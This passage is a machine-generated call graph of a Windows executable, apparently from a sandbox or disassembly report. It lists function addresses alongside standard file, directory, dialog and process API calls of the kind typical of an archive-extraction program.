API calls 24527->24723 24724 edb953 FindClose 24527->24724 24725 eec67e 76 API calls 2 library calls 24527->24725 24726 ef521e 24527->24726 24532 eeda54 GetFileAttributesW 24530->24532 24542 eed9b4 __cftof _wcslen 24530->24542 24532->24527 24533 eeda66 DeleteFileW 24532->24533 24533->24527 24536 eeda77 24533->24536 24535->24527 24537 ed4a20 _swprintf 51 API calls 24536->24537 24539 eeda97 GetFileAttributesW 24537->24539 24538->24527 24539->24536 24540 eedaac MoveFileW 24539->24540 24540->24527 24541 eedac4 MoveFileExW 24540->24541 24541->24527 24542->24527 24542->24532 24722 edcdc0 51 API calls 2 library calls 24542->24722 24544 eeebac __EH_prolog 24543->24544 24741 ee1983 24544->24741 24546 eeebdd 24745 ed64ed 24546->24745 24548 eeebfb 24749 ed8823 24548->24749 24552 eeec4e 24767 ed890a 24552->24767 24554 eecfea 24554->24460 24556 eee7f8 24555->24556 25310 eeb5d6 24556->25310 24559 eed111 24559->24306 24559->24307 24560 eee805 GetWindow 24560->24559 24563 eee825 24560->24563 24561 eee832 GetClassNameW 25315 ee3316 CompareStringW 24561->25315 24563->24559 24563->24561 24564 eee8ba GetWindow 24563->24564 24565 eee856 GetWindowLongW 24563->24565 24564->24559 24564->24563 24565->24564 24566 eee866 SendMessageW 24565->24566 24566->24564 24567 eee87c GetObjectW 24566->24567 25316 eeb615 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24567->25316 24570 eee893 25317 eeb5f4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24570->25317 25318 eeb81c 8 API calls 24570->25318 24572 eee8a4 SendMessageW DeleteObject 24572->24564 24573->24321 24575 eebbe1 24574->24575 24581 eebc06 24574->24581 25321 ee3316 CompareStringW 24575->25321 24577 eebc0b SHAutoComplete 24578 eebc14 24577->24578 24582 eec217 24578->24582 24579 eebbf4 24580 eebbf8 FindWindowExW 24579->24580 24579->24581 24580->24581 24581->24577 24581->24578 24583 eec221 __EH_prolog 24582->24583 24584 ed13f8 43 API calls 24583->24584 24585 eec243 24584->24585 25322 ed2083 24585->25322 24588 eec26c 24590 ed1a7e 142 API calls 24588->24590 24589 eec25d 24591 ed1641 86 API calls 24589->24591 24594 eec28b __InternalCxxFrameHandler ___std_exception_copy 24590->24594 24592 eec268 24591->24592 24592->24349 24592->24351 24593 ed1641 86 API calls 24593->24592 24594->24593 24595->24395 25330 edb4d3 24596->25330 24599->24354 24600->24415 24601->24441 24602->24446 24603->24451 24604->24455 24605->24464 24606->24389 24607->24411 24608->24382 24609->24372 24610->24472 24611->24470 24613 eec7ac GetDlgItem 24612->24613 24614 eec773 GetMessageW 24612->24614 24613->24479 24613->24480 24615 eec798 TranslateMessage DispatchMessageW 24614->24615 24616 eec789 IsDialogMessageW 24614->24616 24615->24613 24616->24613 24616->24615 24618 edb54f 24617->24618 24619 edb573 24618->24619 24620 edb566 CreateDirectoryW 24618->24620 24621 edb4c1 3 API calls 24619->24621 24620->24619 24623 edb5a6 24620->24623 24622 edb579 24621->24622 24624 edb5b9 GetLastError 24622->24624 24630 edcf32 24622->24630 24627 edb5b5 24623->24627 24634 edb8e6 24623->24634 24624->24627 24627->24487 24628 edb58f 24628->24624 24629 edb593 CreateDirectoryW 24628->24629 24629->24623 24629->24624 24631 edcf3f _wcslen 24630->24631 24632 edcfe7 GetCurrentDirectoryW 24631->24632 24633 edcf68 _wcslen 24631->24633 24632->24633 24633->24628 24642 eeffd0 24634->24642 24637 edb909 24639 edcf32 GetCurrentDirectoryW 24637->24639 24638 edb936 24638->24627 24640 edb91d 24639->24640 24640->24638 24641 edb921 SetFileAttributesW 24640->24641 24641->24638 24643 edb8f3 SetFileAttributesW 24642->24643 24643->24637 24643->24638 24645 ed4a0a __vswprintf_c_l 24644->24645 24648 ef72e2 24645->24648 24651 ef53a5 24648->24651 24652 ef53cd 24651->24652 24653 ef53e5 24651->24653 24668 efa7eb 20 API calls __dosmaperr 24652->24668 24653->24652 24655 ef53ed 24653->24655 24657 ef5944 __fassign 38 API calls 24655->24657 24656 ef53d2 24669 ef51b9 26 API calls __cftof 24656->24669 24659 ef53fd 24657->24659 24670 ef590f 20 API calls 2 library calls 24659->24670 24661 ef0d7c CatchGuardHandler 5 API calls 24663 ed4a14 24661->24663 24662 ef5475 24671 ef5cf4 51 API calls 4 library calls 24662->24671 24663->24408 24666 ef53dd 24666->24661 24667 ef5480 24672 ef59c7 20 API calls _free 24667->24672 24668->24656 24669->24666 24670->24662 24671->24667 24672->24666 24674 eda9b7 24673->24674 24675 eda9e1 24673->24675 24674->24675 24684 edb470 24674->24684 24675->24505 24679 eda88c 24678->24679 24680 eda8aa 24678->24680 24679->24680 24682 eda898 FindCloseChangeNotification 24679->24682 24681 eda8c9 24680->24681 24692 ed7685 76 API calls 24680->24692 24681->24505 24682->24680 24685 eeffd0 24684->24685 24686 edb47d DeleteFileW 24685->24686 24687 eda9df 24686->24687 24688 edb490 24686->24688 24687->24505 24689 edcf32 GetCurrentDirectoryW 24688->24689 24690 edb4a4 24689->24690 24690->24687 24691 edb4a8 DeleteFileW 24690->24691 24691->24687 24692->24681 24699 edecd0 24693->24699 24696 edf98b LoadStringW 24697 edf965 SetDlgItemTextW 24696->24697 24698 edf9a2 LoadStringW 24696->24698 24697->24517 24698->24697 24704 edec0c 24699->24704 24701 eded02 24701->24696 24701->24697 24702 edeced 24702->24701 24712 eded10 26 API calls 24702->24712 24705 edec24 24704->24705 24711 edeca4 _strncpy 24704->24711 24707 edec48 24705->24707 24713 ee30f5 WideCharToMultiByte 24705->24713 24710 edec79 24707->24710 24714 edf8d1 50 API calls __vsnprintf 24707->24714 24715 ef7571 26 API calls 3 library calls 24710->24715 24711->24702 24712->24701 24713->24707 24714->24710 24715->24711 24717 eec50e 24716->24717 24718 eec5fd 24717->24718 24719 eec5e0 ExpandEnvironmentStringsW 24717->24719 24718->24527 24719->24718 24720->24527 24721->24527 24722->24542 24723->24527 24724->24527 24725->24527 24727 efa6a4 24726->24727 24728 efa6bc 24727->24728 24729 efa6b1 24727->24729 24731 efa6c4 24728->24731 24737 efa6cd __dosmaperr 24728->24737 24730 efa7fe __vsnwprintf_l 21 API calls 24729->24730 24735 efa6b9 24730->24735 24732 efa66a _free 20 API calls 24731->24732 24732->24735 24733 efa6f7 RtlReAllocateHeap 24733->24735 24733->24737 24734 efa6d2 24739 efa7eb 20 API calls __dosmaperr 24734->24739 24735->24527 24737->24733 24737->24734 24740 ef8e5c 7 API calls 2 library calls 24737->24740 24739->24735 24740->24737 24742 ee1990 _wcslen 24741->24742 24776 ed1895 24742->24776 24744 ee19a8 24744->24546 24746 ee1983 _wcslen 24745->24746 24747 ed1895 78 API calls 24746->24747 24748 ee19a8 24747->24748 24748->24548 24750 ed882d __EH_prolog 24749->24750 24789 ede298 24750->24789 24752 ed8855 24795 eefebe 24752->24795 24754 ed8899 __cftof 24755 eefebe 27 API calls 24754->24755 24756 ed88c0 24755->24756 24808 ee5c64 24756->24808 24759 ed8a38 24760 ed8a42 24759->24760 24761 ed8ab5 24760->24761 24841 edb966 24760->24841 24764 ed8b1a 24761->24764 24819 ed90a2 24761->24819 24763 ed8b5c 24763->24552 24764->24763 24847 ed1397 74 API calls 24764->24847 25306 eda41a 24767->25306 24769 ed892b 24770 ee3546 86 API calls 24769->24770 24771 ed893c Concurrency::cancel_current_task 24769->24771 24770->24771 24772 ed2111 26 API calls 24771->24772 24773 ed8963 24772->24773 24774 ede339 86 API calls 24773->24774 24775 ed896b 24774->24775 24775->24554 24777 ed18ff 24776->24777 24778 ed18a7 24776->24778 24777->24744 24779 ed18d0 24778->24779 24786 ed76e9 76 API calls __vswprintf_c_l 24778->24786 24781 ef521e 22 API calls 24779->24781 24783 ed18f0 24781->24783 24782 ed18c6 24787 ed775a 75 API calls 24782->24787 24783->24777 24788 ed775a 75 API calls 24783->24788 24786->24782 24787->24779 24788->24777 24790 ede2a2 __EH_prolog 24789->24790 24791 eefebe 27 API calls 24790->24791 24792 ede2e5 24791->24792 24793 eefebe 27 API calls 24792->24793 24794 ede309 24793->24794 24794->24752 24797 eefec3 ___std_exception_copy 24795->24797 24796 eefedd 24796->24754 24797->24796 24799 eefedf 24797->24799 24816 ef8e5c 7 API calls 2 library calls 24797->24816 24800 ed48f5 Concurrency::cancel_current_task 24799->24800 24802 eefee9 24799->24802 24814 ef3340 RaiseException 24800->24814 24817 ef3340 RaiseException 24802->24817 24803 ed4911 24805 ed4927 24803->24805 24815 ed136b 26 API calls Concurrency::cancel_current_task 24803->24815 24805->24754 24806 ef0820 24809 ee5c6e __EH_prolog 24808->24809 24810 eefebe 27 API calls 24809->24810 24811 ee5c8a 24810->24811 24812 ed88f2 24811->24812 24818 ee2166 80 API calls 24811->24818 24812->24759 24814->24803 24815->24805 24816->24797 24817->24806 24818->24812 24820 ed90ac __EH_prolog 24819->24820 24848 ed13f8 24820->24848 24822 ed90c8 24823 ed90d9 24822->24823 25010 edb1d2 24822->25010 24829 ed9110 24823->24829 24858 ed1ad3 24823->24858 24828 ed910c 24828->24829 24877 ed2032 24828->24877 25002 ed1641 24829->25002 24831 ed91b2 24881 ed924e 24831->24881 24835 ed9211 24835->24829 24889 ed4264 24835->24889 24901 ed92c6 24835->24901 24838 edb966 7 API calls 24840 ed9139 24838->24840 24840->24831 24840->24838 25014 edd4d2 CompareStringW _wcslen 24840->25014 24842 edb97b 24841->24842 24843 edb9a9 24842->24843 25295 edba94 24842->25295 24843->24760 24845 edb98b 24845->24843 24846 edb990 FindClose 24845->24846 24846->24843 24847->24763 24849 ed13fd __EH_prolog 24848->24849 24850 ede298 27 API calls 24849->24850 24851 ed1437 24850->24851 24852 eefebe 27 API calls 24851->24852 24856 ed14ab 24851->24856 24854 ed1498 24852->24854 24854->24856 25015 ed644d 24854->25015 24855 ed1533 __cftof 24855->24822 25023 edc1f7 24856->25023 24859 ed1add __EH_prolog 24858->24859 24869 ed1c63 24859->24869 24872 ed1b30 24859->24872 25043 ed13d9 24859->25043 24861 ed1c9e 25046 ed1397 74 API calls 24861->25046 24864 ed4264 115 API calls 24868 ed1ce9 24864->24868 24865 ed1cab 24865->24864 24865->24869 24866 ed1d31 24866->24869 24871 ed1d64 24866->24871 25047 ed1397 74 API calls 24866->25047 24868->24866 24870 ed4264 115 API calls 24868->24870 24869->24828 24870->24868 24871->24869 24876 edb110 79 API calls 24871->24876 24872->24861 24872->24865 24872->24869 24873 ed4264 115 API calls 24874 ed1db5 24873->24874 24874->24869 24874->24873 24875 edb110 79 API calls 24875->24872 24876->24874 24878 ed2037 __EH_prolog 24877->24878 24880 ed2068 24878->24880 25061 ed1a7e 24878->25061 24880->24840 25207 ede395 24881->25207 24883 ed925e 25211 ee2701 GetSystemTime SystemTimeToFileTime 24883->25211 24885 ed91cc 24885->24835 24886 ee2eb4 24885->24886 25212 eeefab 24886->25212 24890 ed4274 24889->24890 24891 ed4270 24889->24891 24900 edb110 79 API calls 24890->24900 24891->24835 24892 ed4286 24893 ed42af 24892->24893 24894 ed42a1 24892->24894 25221 ed2eb6 115 API calls 3 library calls 24893->25221 24895 ed42e1 24894->24895 25220 ed395a 103 API calls 3 library calls 24894->25220 24895->24835 24898 ed42ad 24898->24895 25222 ed2544 74 API calls 24898->25222 24900->24892 24902 ed92d0 __EH_prolog 24901->24902 24905 ed930e 24902->24905 24921 ed973d Concurrency::cancel_current_task 24902->24921 25241 ee9cad 117 API calls 24902->25241 24903 eda18d 24906 eda1c5 24903->24906 24907 eda192 24903->24907 24905->24903 24909 ed932f 24905->24909 24905->24921 24906->24921 25271 ee9cad 117 API calls 24906->25271 24907->24921 25270 ed8675 166 API calls 24907->25270 24909->24921 25223 ed66df 24909->25223 24912 ed9545 24915 ed9669 24912->24915 24912->24921 25244 ed8f6b 38 API calls 24912->25244 24914 ed9405 24914->24912 25242 edb5d6 57 API calls 3 library calls 24914->25242 24920 edb966 7 API calls 24915->24920 24924 ed96db 24915->24924 24919 ed95ac 25243 ef8a18 26 API calls 2 library calls 24919->25243 24920->24924 24921->24835 24923 ed9935 25251 ede4a9 96 API calls 24923->25251 25229 ed89c8 24924->25229 24927 ed976c 24950 ed97c5 24927->24950 25245 ed4727 27 API calls 2 library calls 24927->25245 24930 ed9a3a 24934 ed9a8c 24930->24934 24947 ed9a45 24930->24947 24931 ed9990 24931->24930 24935 ed99bb 24931->24935 24942 ed9a2c 24934->24942 25255 ed8db3 119 API calls 24934->25255 24939 edb4c1 3 API calls 24935->24939 24935->24942 24944 ed9ae8 24935->24944 24936 eda14a 24940 eda801 80 API calls 24936->24940 24937 ed9a8a 24938 eda801 80 API calls 24937->24938 24938->24921 24943 ed99f3 24939->24943 24940->24921 24942->24937 24942->24944 24943->24942 25253 eda50a 97 API calls 24943->25253 24944->24936 24961 ed9b53 24944->24961 25256 edab1c 24944->25256 24945 edbf0a 27 API calls 24948 ed9ba2 24945->24948 24947->24937 25254 ed8b7c 123 API calls 24947->25254 24953 edbf0a 27 API calls 24948->24953 24949 ed98ed 25250 ed237a 74 API calls 24949->25250 24950->24921 24950->24949 24957 ed98f4 Concurrency::cancel_current_task 24950->24957 25246 ed87fb 41 API calls 24950->25246 25247 ede4a9 96 API calls 24950->25247 25248 ed237a 74 API calls 24950->25248 25249 ed8f28 98 API calls 24950->25249 24968 ed9bb8 24953->24968 24957->24931 25252 ed851f 50 API calls 2 library calls 24957->25252 24959 ed9b41 25260 ed7951 77 API calls 24959->25260 24961->24945 24962 ed9c8b 24963 ed9e85 24962->24963 24964 ed9ce7 24962->24964 24965 ed9eab 24963->24965 24966 ed9e97 24963->24966 24988 ed9d20 24963->24988 24967 ed9cff 24964->24967 24972 ed9da7 24964->24972 24971 ee4586 75 API calls 24965->24971 24969 eda475 137 API calls 24966->24969 24970 ed9d46 24967->24970 24976 ed9d0e 24967->24976 24968->24962 24973 ed9c62 24968->24973 24981 edaa7a 79 API calls 24968->24981 24969->24988 24970->24988 25263 ed829b 111 API calls 24970->25263 24974 ed9ec4 24971->24974 25264 ed8f6b 38 API calls 24972->25264 24973->24962 25261 edac9c 82 API calls 24973->25261 24978 ee422f 137 API calls 24974->24978 25262 ed237a 74 API calls 24976->25262 24978->24988 24979 ed9e76 24979->24835 24981->24973 24983 ed9dec 24984 ed9e1f 24983->24984 24985 ed9e08 24983->24985 24983->24988 25266 eda212 103 API calls __EH_prolog 24984->25266 25265 ed8037 85 API calls 24985->25265 24988->24979 24991 ed9fca 24988->24991 25267 ed237a 74 API calls 24988->25267 24990 eda0d5 24990->24936 24993 edb8e6 3 API calls 24990->24993 24991->24936 24991->24990 24992 eda083 24991->24992 25235 edb199 SetEndOfFile 24991->25235 25236 edb032 24992->25236 24996 eda130 24993->24996 24996->24936 25268 ed237a 74 API calls 24996->25268 24997 eda0ca 24998 eda880 77 API calls 24997->24998 24998->24990 25000 eda140 25269 ed7871 76 API calls 25000->25269 25003 ed1653 25002->25003 25005 ed1665 Concurrency::cancel_current_task 25002->25005 25003->25005 25285 ed16b2 26 API calls 25003->25285 25006 ed2111 26 API calls 25005->25006 25007 ed1694 25006->25007 25286 ede339 25007->25286 25011 edb1e9 25010->25011 25012 edb1f3 25011->25012 25294 ed77af 78 API calls 25011->25294 25012->24823 25014->24840 25016 ed6457 __EH_prolog 25015->25016 25029 edc9d8 GetCurrentProcess GetProcessAffinityMask 25016->25029 25018 ed6464 25019 ee04e5 41 API calls 25018->25019 25020 ed64bb 25019->25020 25030 ed665c GetCurrentProcess GetProcessAffinityMask 25020->25030 25022 ed64d8 25022->24856 25024 edc20d __cftof 25023->25024 25031 edc0d3 25024->25031 25029->25018 25030->25022 25038 edc0b4 25031->25038 25033 edc148 25034 ed2111 25033->25034 25035 ed211c 25034->25035 25036 ed212b 25034->25036 25042 ed136b 26 API calls Concurrency::cancel_current_task 25035->25042 25036->24855 25039 edc0c2 25038->25039 25040 edc0bd 25038->25040 25039->25033 25041 ed2111 26 API calls 25040->25041 25041->25039 25042->25036 25048 ed1822 25043->25048 25046->24869 25047->24871 25050 ed1834 25048->25050 25056 ed13f2 25048->25056 25049 ed185d 25051 ef521e 22 API calls 25049->25051 25050->25049 25058 ed76e9 76 API calls __vswprintf_c_l 25050->25058 25054 ed187a 25051->25054 25053 ed1853 25059 ed775a 75 API calls 25053->25059 25054->25056 25060 ed775a 75 API calls 25054->25060 25056->24875 25058->25053 25059->25049 25060->25056 25062 ed1a8e 25061->25062 25064 ed1a8a 25061->25064 25065 ed19c5 25062->25065 25064->24880 25066 ed19d7 25065->25066 25067 ed1a14 25065->25067 25068 ed4264 115 API calls 25066->25068 25073 ed46ce 25067->25073 25071 ed19f7 25068->25071 25071->25064 25077 ed46d7 25073->25077 25074 ed4264 115 API calls 25074->25077 25075 ed1a35 25075->25071 25078 ed1f30 25075->25078 25077->25074 25077->25075 25090 ee2128 25077->25090 25079 ed1f3a __EH_prolog 25078->25079 25098 ed42f1 25079->25098 25081 ed1f61 25082 ed1822 78 API calls 25081->25082 25084 ed1fe8 25081->25084 25083 ed1f78 25082->25083 25126 ed190b 78 API calls 25083->25126 25084->25071 25086 ed1f90 25087 ed1f9c _wcslen 25086->25087 25127 ee2ed2 MultiByteToWideChar 25086->25127 25128 ed190b 78 API calls 25087->25128 25091 ee212f 25090->25091 25092 ee214a 25091->25092 25096 ed76e4 RaiseException _com_raise_error 25091->25096 25094 ee215b SetThreadExecutionState 25092->25094 25097 ed76e4 RaiseException _com_raise_error 25092->25097 25094->25077 25096->25092 25097->25094 25099 ed42fb __EH_prolog 25098->25099 25100 ed432d 25099->25100 25101 ed4311 25099->25101 25103 ed4588 25100->25103 25106 ed4359 25100->25106 25154 ed1397 74 API calls 25101->25154 25174 ed1397 74 API calls 25103->25174 25105 ed431c 25105->25081 25106->25105 25129 ee4586 25106->25129 25108 ed43da 25110 ed4465 25108->25110 25125 ed43d1 25108->25125 25157 ede4a9 96 API calls 25108->25157 25109 ed43d6 25109->25108 25156 ed252a 78 API calls 25109->25156 25139 edbf0a 25110->25139 25112 ed43a8 25112->25108 25112->25109 25113 ed43c6 25112->25113 25155 ed1397 74 API calls 25113->25155 25114 ed4478 25119 ed450e 25114->25119 25120 ed44fe 25114->25120 25158 ee422f 25119->25158 25143 eda475 25120->25143 25123 ed450c 25123->25125 25167 ed237a 74 API calls 25123->25167 25168 ee3546 25125->25168 25126->25086 25127->25087 25128->25084 25130 ee459b 25129->25130 25131 ee45a5 ___std_exception_copy 25129->25131 25175 ed775a 75 API calls 25130->25175 25133 ee462b 25131->25133 25134 ee46d5 25131->25134 25138 ee464f __cftof 25131->25138 25176 ee44b9 75 API calls 3 library calls 25133->25176 25177 ef3340 RaiseException 25134->25177 25137 ee4701 25138->25112 25140 edbf18 25139->25140 25142 edbf22 25139->25142 25141 eefebe 27 API calls 25140->25141 25141->25142 25142->25114 25144 eda47f __EH_prolog 25143->25144 25178 ed8a1f 25144->25178 25147 ed13d9 78 API calls 25148 eda492 25147->25148 25181 ede56c 25148->25181 25150 eda4ee 25150->25123 25151 ede56c 132 API calls 25153 eda4a5 25151->25153 25153->25150 25153->25151 25190 ede758 97 API calls __InternalCxxFrameHandler 25153->25190 25154->25105 25155->25125 25156->25108 25157->25110 25159 ee4238 25158->25159 25161 ee4261 25158->25161 25160 ee4255 25159->25160 25162 ee4257 25159->25162 25164 ee424d 25159->25164 25160->25123 25161->25160 25205 ee66d4 137 API calls 2 library calls 25161->25205 25204 ee73ae 132 API calls 25162->25204 25191 ee7ddc 25164->25191 25167->25125 25169 ee3550 25168->25169 25170 ee3569 25169->25170 25173 ee357d 25169->25173 25206 ee220d 86 API calls 25170->25206 25172 ee3570 Concurrency::cancel_current_task 25172->25173 25174->25105 25175->25131 25176->25138 25177->25137 25179 edc619 GetVersionExW 25178->25179 25180 ed8a24 25179->25180 25180->25147 25187 ede582 __InternalCxxFrameHandler 25181->25187 25182 ede6f2 25183 ede726 25182->25183 25184 ede523 6 API calls 25182->25184 25185 ee2128 SetThreadExecutionState RaiseException 25183->25185 25184->25183 25186 ede6e9 25185->25186 25186->25153 25187->25182 25187->25186 25188 ee9cad 117 API calls 25187->25188 25189 edbff5 91 API calls 25187->25189 25188->25187 25189->25187 25190->25153 25192 ee47ad 75 API calls 25191->25192 25201 ee7ded __InternalCxxFrameHandler 25192->25201 25193 ede56c 132 API calls 25193->25201 25194 ee81fe 25195 ee63b9 98 API calls 25194->25195 25196 ee820e __InternalCxxFrameHandler 25195->25196 25196->25160 25197 ee24ef 81 API calls 25197->25201 25198 ee5011 132 API calls 25198->25201 25199 ee8253 132 API calls 25199->25201 25200 ee22a6 88 API calls 25200->25201 25201->25193 25201->25194 25201->25197 25201->25198 25201->25199 25201->25200 25202 ee4b1c 98 API calls 25201->25202 25203 ee88af 137 API calls 25201->25203 25202->25201 25203->25201 25204->25160 25205->25160 25206->25172 25208 ede3a5 25207->25208 25210 ede3ac 25207->25210 25209 edaa7a 79 API calls 25208->25209 25209->25210 25210->24883 25211->24885 25213 eeefb8 25212->25213 25214 edf937 53 API calls 25213->25214 25215 eeefdb 25214->25215 25216 ed4a20 _swprintf 51 API calls 25215->25216 25217 eeefed 25216->25217 25218 eee619 16 API calls 25217->25218 25219 ee2eca 25218->25219 25219->24835 25220->24898 25221->24898 25222->24895 25224 ed66ef 25223->25224 25272 ed65fb 25224->25272 25227 ed6722 25228 ed675a 25227->25228 25277 edc6af CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25227->25277 25228->24914 25230 ed89dd 25229->25230 25231 ed8a15 25230->25231 25283 ed7931 74 API calls 25230->25283 25231->24921 25231->24923 25231->24927 25233 ed8a0d 25284 ed1397 74 API calls 25233->25284 25235->24992 25237 edb043 25236->25237 25240 edb052 25236->25240 25238 edb049 FlushFileBuffers 25237->25238 25237->25240 25238->25240 25239 edb0cf SetFileTime 25239->24997 25240->25239 25241->24905 25242->24919 25243->24912 25244->24915 25245->24950 25246->24950 25247->24950 25248->24950 25249->24950 25250->24957 25251->24957 25252->24931 25253->24942 25254->24937 25255->24942 25257 edab25 GetFileType 25256->25257 25258 ed9b2b 25256->25258 25257->25258 25258->24961 25259 ed237a 74 API calls 25258->25259 25259->24959 25260->24961 25261->24962 25262->24988 25263->24988 25264->24983 25265->24988 25266->24988 25267->24991 25268->25000 25269->24936 25270->24921 25271->24921 25278 ed64f8 25272->25278 25274 ed661c 25274->25227 25276 ed64f8 2 API calls 25276->25274 25277->25227 25279 ed6502 25278->25279 25280 ed65ea 25279->25280 25282 edc6af CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25279->25282 25280->25274 25280->25276 25282->25279 25283->25233 25284->25231 25287 ede34a Concurrency::cancel_current_task 25286->25287 25292 edbd8e 86 API calls Concurrency::cancel_current_task 25287->25292 25289 ede37c 25293 edbd8e 86 API calls Concurrency::cancel_current_task 25289->25293 25291 ede387 25292->25289 25293->25291 25294->25012 25296 edbaa1 25295->25296 25297 edbaba FindFirstFileW 25296->25297 25298 edbb20 FindNextFileW 25296->25298 25300 edbac9 25297->25300 25305 edbb02 25297->25305 25299 edbb2b GetLastError 25298->25299 25298->25305 25299->25305 25301 edcf32 GetCurrentDirectoryW 25300->25301 25302 edbad9 25301->25302 25303 edbadd FindFirstFileW 25302->25303 25304 edbaf7 GetLastError 25302->25304 25303->25304 25303->25305 25304->25305 25305->24845 25308 eda425 25306->25308 25309 eda458 __cftof 25306->25309 25307 edb470 3 API calls 25307->25308 25308->25307 25308->25309 25309->24769 25319 eeb5f4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25310->25319 25312 eeb5dd 25313 eeb5e9 25312->25313 25320 eeb615 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25312->25320 25313->24559 25313->24560 25315->24563 25316->24570 25317->24570 25318->24572 25319->25312 25320->25313 25321->24579 25323 edb1d2 78 API calls 25322->25323 25324 ed208f 25323->25324 25325 ed1ad3 115 API calls 25324->25325 25328 ed20ac 25324->25328 25326 ed209c 25325->25326 25326->25328 25329 ed1397 74 API calls 25326->25329 25328->24588 25328->24589 25329->25328 25331 eeffd0 25330->25331 25332 edb4e0 GetFileAttributesW 25331->25332 25333 edb4ca 25332->25333 25334 edb4f1 25332->25334 25333->24354 25333->24363 25335 edcf32 GetCurrentDirectoryW 25334->25335 25336 edb505 25335->25336 25336->25333 25337 edb509 GetFileAttributesW 25336->25337 25337->25333 26038 eed8d8 97 API calls 4 library calls 26081 ef4bd0 5 API calls CatchGuardHandler 26039 eed8d8 107 API calls 4 library calls 26040 eef5af 14 API calls ___delayLoadHelper2@8 25352 eef5a5 25353 eef54e 25352->25353 25353->25352 25354 eef9e9 ___delayLoadHelper2@8 14 API calls 25353->25354 25354->25353 26006 eea4a0 GetClientRect 26007 efd0a0 GetCommandLineA GetCommandLineW 25387 ed10b5 25388 ed644d 43 API calls 25387->25388 25389 ed10ba 25388->25389 25392 ef0372 29 API calls 25389->25392 25391 ed10c4 25392->25391 26083 eec7b0 100 API calls 26084 ef0f0f 9 API calls 2 library calls 25398 efbdb0 25399 efbdbb 25398->25399 25401 efbde4 25399->25401 25402 efbde0 25399->25402 25404 efc0ca 25399->25404 25411 efbe10 DeleteCriticalSection 25401->25411 25405 efbe58 __dosmaperr 5 API calls 25404->25405 25406 efc0f1 25405->25406 25407 efc10f InitializeCriticalSectionAndSpinCount 25406->25407 25410 efc0fa 25406->25410 25407->25410 25408 ef0d7c CatchGuardHandler 5 API calls 25409 efc126 25408->25409 25409->25399 25410->25408 25411->25402 26063 ef3e8b 38 API calls 4 library calls 26009 ee8880 132 API calls 26041 ef1180 RaiseException _com_raise_error _com_error::_com_error 25440 eede9d 25442 eedf67 25440->25442 25448 eedec0 25440->25448 25441 eec504 ExpandEnvironmentStringsW 25456 eed8d8 _wcslen _wcsrchr 25441->25456 25442->25456 25468 eee8df 25442->25468 25444 eee54f 25445 ee3316 CompareStringW 25445->25448 25447 eedbac SetWindowTextW 25447->25456 25448->25442 25448->25445 25451 ef521e 22 API calls 25451->25456 25453 eed99a SetFileAttributesW 25455 eeda54 GetFileAttributesW 25453->25455 25466 eed9b4 __cftof _wcslen 25453->25466 25455->25456 25457 eeda66 DeleteFileW 25455->25457 25456->25441 25456->25444 25456->25447 25456->25451 25456->25453 25459 eedd76 GetDlgItem SetWindowTextW SendMessageW 25456->25459 25462 eeddb6 SendMessageW 25456->25462 25467 ee3316 CompareStringW 25456->25467 25492 eeb65d GetCurrentDirectoryW 25456->25492 25494 edb9ca 6 API calls 25456->25494 25495 edb953 FindClose 25456->25495 25496 eec67e 76 API calls 2 library calls 25456->25496 25457->25456 25460 eeda77 25457->25460 25459->25456 25461 ed4a20 _swprintf 51 API calls 25460->25461 25463 eeda97 GetFileAttributesW 25461->25463 25462->25456 25463->25460 25464 eedaac MoveFileW 25463->25464 25464->25456 25465 eedac4 MoveFileExW 25464->25465 25465->25456 25466->25455 25466->25456 25493 edcdc0 51 API calls 2 library calls 25466->25493 25467->25456 25471 eee8e9 __cftof _wcslen 25468->25471 25469 eeeb37 25469->25456 25470 eeeb10 25470->25469 25475 eeeb2e ShowWindow 25470->25475 25471->25469 25471->25470 25472 eee9f5 25471->25472 25497 ee3316 CompareStringW 25471->25497 25474 edb4c1 3 API calls 25472->25474 25476 eeea0a 25474->25476 25475->25469 25477 eeea29 ShellExecuteExW 25476->25477 25498 edcad4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 25476->25498 25477->25469 25484 eeea3c 25477->25484 25479 eeea21 25479->25477 25480 eeea75 25499 eeed8b 6 API calls 25480->25499 25481 eeeacb CloseHandle 25482 eeeae4 25481->25482 25483 eeead9 25481->25483 25482->25470 25500 ee3316 CompareStringW 25483->25500 25484->25480 25484->25481 25486 eeea6b ShowWindow 25484->25486 25486->25480 25488 eeea8d 25488->25481 25489 eeeaa0 GetExitCodeProcess 25488->25489 25489->25481 25490 eeeab3 25489->25490 25490->25481 25492->25456 25493->25466 25494->25456 25495->25456 25496->25456 25497->25472 25498->25479 25499->25488 25500->25482 26010 ed1095 44 API calls 26011 eeb090 28 API calls 26043 efb590 21 API calls 2 library calls 26065 ef3a90 6 API calls 4 library calls 26086 ef0790 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 26014 eec460 99 API calls 26066 efb660 71 API calls _free 26067 eefe61 48 API calls _unexpected 26068 f01a60 IsProcessorFeaturePresent 23984 ed1075 23989 ee04e5 23984->23989 23986 ed107a 23993 ef0372 29 API calls 23986->23993 23988 ed1084 23990 ee04ef __EH_prolog 23989->23990 23994 ed4846 41 API calls 23990->23994 23992 ee050b 23992->23986 23993->23988 23994->23992 26048 ed2570 96 API calls 26087 ef0747 29 API calls _abort 26050 eea540 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 26051 ef0540 46 API calls __RTC_Initialize 26069 efc65d 6 API calls CatchGuardHandler 24267 eefd58 24268 eefd62 24267->24268 24269 eef9e9 ___delayLoadHelper2@8 14 API calls 24268->24269 24270 eefd6f 24269->24270 26018 eda850 80 API calls Concurrency::cancel_current_task 26019 eeb450 GdipCloneImage GdipAlloc 26088 eee750 70 API calls 26053 ef1550 51 API calls 2 library calls 26020 ee742e 137 API calls __InternalCxxFrameHandler 25340 edca2e 25341 edca40 __cftof 25340->25341 25344 ee23fb 25341->25344 25347 ee23bd GetCurrentProcess GetProcessAffinityMask 25344->25347 25348 edca97 25347->25348 25350 eef32b 14 API calls ___delayLoadHelper2@8 26071 ef962a 55 API calls _free 26021 ed1025 29 API calls 26054 ed6920 41 API calls __EH_prolog 26022 eed420 91 API calls _swprintf 25357 efa620 25365 efbf6f 25357->25365 25360 efa634 25362 efa63c 